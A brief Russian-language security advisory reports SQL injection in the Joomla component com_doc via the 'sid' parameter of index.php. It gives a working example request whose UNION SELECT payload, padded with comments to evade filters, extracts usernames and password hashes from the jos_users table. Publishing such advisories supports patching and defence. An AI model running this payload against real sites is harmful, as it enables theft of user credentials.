Программа: Joomla Component com_doc

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «sid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

index.php?option=com_doc&task=view&sid=-1/**/union/**/select/* */concat(username,0x3a,password),1,2,concat(username,0x3a, password),0x3a,5,6,7,8,password,username,11/* */from/**/jos_users/



Оставить мнение